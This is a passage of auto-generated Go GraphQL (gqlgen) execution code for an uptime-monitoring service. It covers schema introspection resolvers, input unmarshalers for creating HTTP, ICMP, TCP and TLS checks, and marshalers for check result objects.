ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Name, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) ___Field_description(ctx context.Context, field graphql.CollectedField, obj *introspection.Field) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Field",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Description, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalOString2string(ctx, field.Selections, res)
}
func (ec *executionContext) ___Field_args(ctx context.Context, field graphql.CollectedField, obj *introspection.Field) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Field",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Args, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.([]introspection.InputValue)
fc.Result = res
return ec.marshalN__InputValue2ᚕgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐInputValueᚄ(ctx, field.Selections, res)
}
func (ec *executionContext) ___Field_type(ctx context.Context, field graphql.CollectedField, obj *introspection.Field) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Field",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Type, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(*introspection.Type)
fc.Result = res
return ec.marshalN__Type2ᚖgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐType(ctx, field.Selections, res)
}
func (ec *executionContext) ___Field_isDeprecated(ctx context.Context, field graphql.CollectedField, obj *introspection.Field) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Field",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.IsDeprecated(), nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(bool)
fc.Result = res
return ec.marshalNBoolean2bool(ctx, field.Selections, res)
}
func (ec *executionContext) ___Field_deprecationReason(ctx context.Context, field graphql.CollectedField, obj *introspection.Field) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Field",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.DeprecationReason(), nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.(*string)
fc.Result = res
return ec.marshalOString2ᚖstring(ctx, field.Selections, res)
}
func (ec *executionContext) ___InputValue_name(ctx context.Context, field graphql.CollectedField, obj *introspection.InputValue) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__InputValue",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Name, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) ___InputValue_description(ctx context.Context, field graphql.CollectedField, obj *introspection.InputValue) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__InputValue",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Description, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalOString2string(ctx, field.Selections, res)
}
func (ec *executionContext) ___InputValue_type(ctx context.Context, field graphql.CollectedField, obj *introspection.InputValue) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__InputValue",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Type, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(*introspection.Type)
fc.Result = res
return ec.marshalN__Type2ᚖgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐType(ctx, field.Selections, res)
}
func (ec *executionContext) ___InputValue_defaultValue(ctx context.Context, field graphql.CollectedField, obj *introspection.InputValue) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__InputValue",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.DefaultValue, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.(*string)
fc.Result = res
return ec.marshalOString2ᚖstring(ctx, field.Selections, res)
}
func (ec *executionContext) ___Schema_types(ctx context.Context, field graphql.CollectedField, obj *introspection.Schema) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Schema",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Types(), nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.([]introspection.Type)
fc.Result = res
return ec.marshalN__Type2ᚕgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐTypeᚄ(ctx, field.Selections, res)
}
func (ec *executionContext) ___Schema_queryType(ctx context.Context, field graphql.CollectedField, obj *introspection.Schema) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Schema",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.QueryType(), nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(*introspection.Type)
fc.Result = res
return ec.marshalN__Type2ᚖgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐType(ctx, field.Selections, res)
}
func (ec *executionContext) ___Schema_mutationType(ctx context.Context, field graphql.CollectedField, obj *introspection.Schema) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Schema",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.MutationType(), nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.(*introspection.Type)
fc.Result = res
return ec.marshalO__Type2ᚖgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐType(ctx, field.Selections, res)
}
func (ec *executionContext) ___Schema_subscriptionType(ctx context.Context, field graphql.CollectedField, obj *introspection.Schema) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Schema",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.SubscriptionType(), nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.(*introspection.Type)
fc.Result = res
return ec.marshalO__Type2ᚖgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐType(ctx, field.Selections, res)
}
func (ec *executionContext) ___Schema_directives(ctx context.Context, field graphql.CollectedField, obj *introspection.Schema) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Schema",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Directives(), nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.([]introspection.Directive)
fc.Result = res
return ec.marshalN__Directive2ᚕgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐDirectiveᚄ(ctx, field.Selections, res)
}
func (ec *executionContext) ___Type_kind(ctx context.Context, field graphql.CollectedField, obj *introspection.Type) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Type",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Kind(), nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalN__TypeKind2string(ctx, field.Selections, res)
}
func (ec *executionContext) ___Type_name(ctx context.Context, field graphql.CollectedField, obj *introspection.Type) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Type",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Name(), nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.(*string)
fc.Result = res
return ec.marshalOString2ᚖstring(ctx, field.Selections, res)
}
func (ec *executionContext) ___Type_description(ctx context.Context, field graphql.CollectedField, obj *introspection.Type) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Type",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Description(), nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalOString2string(ctx, field.Selections, res)
}
func (ec *executionContext) ___Type_fields(ctx context.Context, field graphql.CollectedField, obj *introspection.Type) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Type",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
rawArgs := field.ArgumentMap(ec.Variables)
args, err := ec.field___Type_fields_args(ctx, rawArgs)
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
fc.Args = args
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Fields(args["includeDeprecated"].(bool)), nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.([]introspection.Field)
fc.Result = res
return ec.marshalO__Field2ᚕgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐFieldᚄ(ctx, field.Selections, res)
}
func (ec *executionContext) ___Type_interfaces(ctx context.Context, field graphql.CollectedField, obj *introspection.Type) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Type",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Interfaces(), nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.([]introspection.Type)
fc.Result = res
return ec.marshalO__Type2ᚕgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐTypeᚄ(ctx, field.Selections, res)
}
func (ec *executionContext) ___Type_possibleTypes(ctx context.Context, field graphql.CollectedField, obj *introspection.Type) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Type",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.PossibleTypes(), nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.([]introspection.Type)
fc.Result = res
return ec.marshalO__Type2ᚕgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐTypeᚄ(ctx, field.Selections, res)
}
func (ec *executionContext) ___Type_enumValues(ctx context.Context, field graphql.CollectedField, obj *introspection.Type) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Type",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
rawArgs := field.ArgumentMap(ec.Variables)
args, err := ec.field___Type_enumValues_args(ctx, rawArgs)
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
fc.Args = args
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.EnumValues(args["includeDeprecated"].(bool)), nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.([]introspection.EnumValue)
fc.Result = res
return ec.marshalO__EnumValue2ᚕgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐEnumValueᚄ(ctx, field.Selections, res)
}
func (ec *executionContext) ___Type_inputFields(ctx context.Context, field graphql.CollectedField, obj *introspection.Type) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Type",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.InputFields(), nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.([]introspection.InputValue)
fc.Result = res
return ec.marshalO__InputValue2ᚕgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐInputValueᚄ(ctx, field.Selections, res)
}
func (ec *executionContext) ___Type_ofType(ctx context.Context, field graphql.CollectedField, obj *introspection.Type) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Type",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.OfType(), nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.(*introspection.Type)
fc.Result = res
return ec.marshalO__Type2ᚖgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐType(ctx, field.Selections, res)
}
// endregion **************************** field.gotpl *****************************
// region **************************** input.gotpl *****************************
func (ec *executionContext) unmarshalInputCreateHttpCheckInput(ctx context.Context, obj interface{}) (models.CreateHTTPCheckInput, error) {
var it models.CreateHTTPCheckInput
var asMap = obj.(map[string]interface{})
for k, v := range asMap {
switch k {
case "id":
var err error
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("id"))
it.ID, err = ec.unmarshalNString2string(ctx, v)
if err != nil {
return it, err
}
case "frecuency":
var err error
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("frecuency"))
it.Frecuency, err = ec.unmarshalNString2string(ctx, v)
if err != nil {
return it, err
}
case "url":
var err error
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("url"))
it.URL, err = ec.unmarshalNString2string(ctx, v)
if err != nil {
return it, err
}
}
}
return it, nil
}
func (ec *executionContext) unmarshalInputCreateIcmpCheckInput(ctx context.Context, obj interface{}) (models.CreateIcmpCheckInput, error) {
var it models.CreateIcmpCheckInput
var asMap = obj.(map[string]interface{})
for k, v := range asMap {
switch k {
case "id":
var err error
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("id"))
it.ID, err = ec.unmarshalNString2string(ctx, v)
if err != nil {
return it, err
}
case "frecuency":
var err error
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("frecuency"))
it.Frecuency, err = ec.unmarshalNString2string(ctx, v)
if err != nil {
return it, err
}
case "address":
var err error
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("address"))
it.Address, err = ec.unmarshalNString2string(ctx, v)
if err != nil {
return it, err
}
}
}
return it, nil
}
func (ec *executionContext) unmarshalInputCreateTcpCheckInput(ctx context.Context, obj interface{}) (models.CreateTCPCheckInput, error) {
var it models.CreateTCPCheckInput
var asMap = obj.(map[string]interface{})
for k, v := range asMap {
switch k {
case "id":
var err error
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("id"))
it.ID, err = ec.unmarshalNString2string(ctx, v)
if err != nil {
return it, err
}
case "frecuency":
var err error
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("frecuency"))
it.Frecuency, err = ec.unmarshalNString2string(ctx, v)
if err != nil {
return it, err
}
case "address":
var err error
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("address"))
it.Address, err = ec.unmarshalNString2string(ctx, v)
if err != nil {
return it, err
}
}
}
return it, nil
}
func (ec *executionContext) unmarshalInputCreateTlsCheckInput(ctx context.Context, obj interface{}) (models.CreateTLSCheckInput, error) {
var it models.CreateTLSCheckInput
var asMap = obj.(map[string]interface{})
for k, v := range asMap {
switch k {
case "id":
var err error
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("id"))
it.ID, err = ec.unmarshalNString2string(ctx, v)
if err != nil {
return it, err
}
case "frecuency":
var err error
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("frecuency"))
it.Frecuency, err = ec.unmarshalNString2string(ctx, v)
if err != nil {
return it, err
}
case "address":
var err error
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("address"))
it.Address, err = ec.unmarshalNString2string(ctx, v)
if err != nil {
return it, err
}
case "rootCAs":
var err error
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("rootCAs"))
it.RootCAs, err = ec.unmarshalOString2ᚖstring(ctx, v)
if err != nil {
return it, err
}
}
}
return it, nil
}
// endregion **************************** input.gotpl *****************************
// region ************************** interface.gotpl ***************************
func (ec *executionContext) _Check(ctx context.Context, sel ast.SelectionSet, obj models.Check) graphql.Marshaler {
switch obj := (obj).(type) {
case nil:
return graphql.Null
case models.HTTPCheck:
return ec._HttpCheck(ctx, sel, &obj)
case *models.HTTPCheck:
if obj == nil {
return graphql.Null
}
return ec._HttpCheck(ctx, sel, obj)
case models.TCPCheck:
return ec._TcpCheck(ctx, sel, &obj)
case *models.TCPCheck:
if obj == nil {
return graphql.Null
}
return ec._TcpCheck(ctx, sel, obj)
case models.TLSCheck:
return ec._TlsCheck(ctx, sel, &obj)
case *models.TLSCheck:
if obj == nil {
return graphql.Null
}
return ec._TlsCheck(ctx, sel, obj)
case models.IcmpCheck:
return ec._IcmpCheck(ctx, sel, &obj)
case *models.IcmpCheck:
if obj == nil {
return graphql.Null
}
return ec._IcmpCheck(ctx, sel, obj)
default:
panic(fmt.Errorf("unexpected type %T", obj))
}
}
// endregion ************************** interface.gotpl ***************************
// region **************************** object.gotpl ****************************
var checkExecutionImplementors = []string{"CheckExecution"}
func (ec *executionContext) _CheckExecution(ctx context.Context, sel ast.SelectionSet, obj *models.CheckExecution) graphql.Marshaler {
fields := graphql.CollectFields(ec.OperationContext, sel, checkExecutionImplementors)
out := graphql.NewFieldSet(fields)
var invalids uint32
for i, field := range fields {
switch field.Name {
case "__typename":
out.Values[i] = graphql.MarshalString("CheckExecution")
case "id":
out.Values[i] = ec._CheckExecution_id(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "executionTime":
out.Values[i] = ec._CheckExecution_executionTime(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "message":
out.Values[i] = ec._CheckExecution_message(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "errorMsg":
out.Values[i] = ec._CheckExecution_errorMsg(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "status":
out.Values[i] = ec._CheckExecution_status(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
default:
panic("unknown field " + strconv.Quote(field.Name))
}
}
out.Dispatch()
if invalids > 0 {
return graphql.Null
}
return out
}
var deleteResponseImplementors = []string{"DeleteResponse"}
func (ec *executionContext) _DeleteResponse(ctx context.Context, sel ast.SelectionSet, obj *models.DeleteResponse) graphql.Marshaler {
fields := graphql.CollectFields(ec.OperationContext, sel, deleteResponseImplementors)
out := graphql.NewFieldSet(fields)
var invalids uint32
for i, field := range fields {
switch field.Name {
case "__typename":
out.Values[i] = graphql.MarshalString("DeleteResponse")
case "id":
out.Values[i] = ec._DeleteResponse_id(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
default:
panic("unknown field " + strconv.Quote(field.Name))
}
}
out.Dispatch()
if invalids > 0 {
return graphql.Null
}
return out
}
var httpCheckImplementors = []string{"HttpCheck", "Check"}
func (ec *executionContext) _HttpCheck(ctx context.Context, sel ast.SelectionSet, obj *models.HTTPCheck) graphql.Marshaler {
fields := graphql.CollectFields(ec.OperationContext, sel, httpCheckImplementors)
out := graphql.NewFieldSet(fields)
var invalids uint32
for i, field := range fields {
switch field.Name {
case "__typename":
out.Values[i] = graphql.MarshalString("HttpCheck")
case "id":
out.Values[i] = ec._HttpCheck_id(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "identifier":
out.Values[i] = ec._HttpCheck_identifier(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "frecuency":
out.Values[i] = ec._HttpCheck_frecuency(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "url":
out.Values[i] = ec._HttpCheck_url(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "status":
out.Values[i] = ec._HttpCheck_status(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "latestCheck":
out.Values[i] = ec._HttpCheck_latestCheck(ctx, field, obj)
case "message":
out.Values[i] = ec._HttpCheck_message(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "errorMsg":
out.Values[i] = ec._HttpCheck_errorMsg(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
default:
panic("unknown field " + strconv.Quote(field.Name))
}
}
out.Dispatch()
if invalids > 0 {
return graphql.Null
}
return out
}
var icmpCheckImplementors = []string{"IcmpCheck", "Check"}
func (ec *executionContext) _IcmpCheck(ctx context.Context, sel ast.SelectionSet, obj *models.IcmpCheck) graphql.Marshaler {
fields := graphql.CollectFields(ec.OperationContext, sel, icmpCheckImplementors)
out := graphql.NewFieldSet(fields)
var invalids uint32
for i, field := range fields {
switch field.Name {
case "__typename":
out.Values[i] = graphql.MarshalString("IcmpCheck")
case "id":
out.Values[i] = ec._IcmpCheck_id(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "identifier":
out.Values[i] = ec._IcmpCheck_identifier(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "frecuency":
out.Values[i] = ec._IcmpCheck_frecuency(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "address":
out.Values[i] = ec._IcmpCheck_address(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "status":
out.Values[i] = ec._IcmpCheck_status(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "latestCheck":
out.Values[i] = ec._IcmpCheck_latestCheck(ctx, field, obj)
case "message":
out.Values[i] = ec._IcmpCheck_message(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "errorMsg":
out.Values[i] = ec._IcmpCheck_errorMsg(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
default:
panic("unknown field " + strconv.Quote(field.Name))
}
}
out.Dispatch()
if invalids > 0 {
return graphql.Null
}
return out
}
